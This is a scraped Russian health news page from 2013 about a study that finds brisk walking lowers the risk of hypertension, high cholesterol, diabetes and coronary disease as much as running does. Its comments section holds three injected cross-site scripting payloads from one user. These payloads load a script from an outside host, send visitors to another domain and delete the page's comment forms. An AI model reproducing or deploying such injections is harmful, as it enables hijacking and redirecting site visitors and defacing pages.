Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  От инфаркта не убежать, н...  >>  От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом!
 
Обратная связь
 

От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом!

Размер шрифта
03 июня 2013 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

«Активная ходьба снижает риск гипертонии, атеросклероза и диабета в той же степени, что и бег», – сообщается в американском журнале «Атеросклероз, тромбоз и биология сосудов».

Ученые исследовали 33 060 людей, увлекающихся бегом, и 15 045 тех, кто занимается ходьбой. После 6 лет изучения они пришли к выводу, что умеренная ходьба и интенсивный бег в одинаковой степени снижают риск гипертонии, атеросклероза, диабета и ишемической болезни сердца.

«При беге и при ходьбе задействованы одни и те же группы мышц, только они производят работу разной интенсивности», – говорит Пол Вильямс, ведущий врач исследования и ученый из Университета Беркли, штат Калифорния.

В отличие от других исследований, расход энергии при ходьбе и при беге оценивали с учетом преодоленной дистанции, а не затраченного времени. Участники заполняли анкеты, в которых указывали интересующую ученых информацию. Оказалось, что чем больше расстояние, тем существенней польза для здоровья.

Ходить или бегать?

Проанализировав анкеты участников и оценив случаи гипертензии, повышения уровня холестерина, диабета и коронарной болезни сердца, ученые пришли к следующим выводам:

  • Бег снижает риск развития гипертензии на 4,2%, а ходьба – на 7,2%
  • Бег снижает риск повышения концентрации холестерина в крови на 4,3%, а ходьба – на 7%
  • Бег уменьшает риск развития диабета на 12,1%, а ходьба – на 12,3%
  • Бег снижает риск развития коронарной болезни сердца лишь на 4,5%, в то время как ходьба – на 9,3%

«Ходьба является более доступной для большинства по сравнению с бегом. К тому же те, кто предпочитает пробежки, испытывают вдвое большую нагрузку» – комментирует Вильямс.

В исследовании принимали участие люди от 18 до 80 лет, средний возраст участников – 40-50 лет. 21% выбравших ходьбу и 51,4% предпочитающих бег – мужчины.

«Люди всегда придумывают для себя отговорки, чтобы не заниматься спортом, но сейчас вы лишь должны выбрать между бегом и ходьбой и обеспечить себе хорошее здоровье в будущем», – говорит Вильямс.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:17

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:15

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как угробить свое сердце?!   6 признаков, что ваше сердце вот-вот откажет   Одним выстрелом двух зайцев! Обезболивающее лечит диабет   Новый механизм контроля ожирения и атеросклероза  
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 14 ноября 2012Сидячий образ жизни вреден для почек
 
24 июня 2011Потеря веса лечит диабет 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
5 отговорок, которые убивают ваше сердце и мешают похудеть
Почему вы не можете похудеть? 10 причин!
Убийцы эрекции вашего мужа

Тесты

1
Правильно ли вы худеете?
Оцените риск развития сахарного диабета
Готовы ли вы сбросить лишнее?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.